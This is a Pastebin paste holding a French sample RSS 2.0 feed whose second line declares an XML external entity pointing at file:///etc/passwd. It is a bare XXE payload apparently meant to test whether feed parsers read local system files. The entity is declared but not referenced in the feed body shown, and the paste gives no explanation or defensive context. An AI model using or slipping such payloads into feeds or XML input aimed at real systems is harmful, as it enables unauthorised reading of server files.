Advertisement
Guest User

Untitled

a guest
Oct 21st, 2014
182
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
  3. <rss version="2.0">
  4. <channel>
  5. <title>Mon site</title>
  6. <description>Ceci est un exemple de flux RSS 2.0</description>
  7. <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
  8. <link>http://www.example.org</link>
  9. <item>
  10. <title>prout</title>
  11. <description>Ceci est ma première actualité</description>
  12. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  13. <link>http://www.example.org/actu1</link>
  14. </item>
  15. <item>
  16. <title>Actualité N°2</title>
  17. <description>Ceci est ma seconde actualité</description>
  18. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  19. <link>http://www.example.org/actu2</link>
  20. </item>
  21. </channel>
  22. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement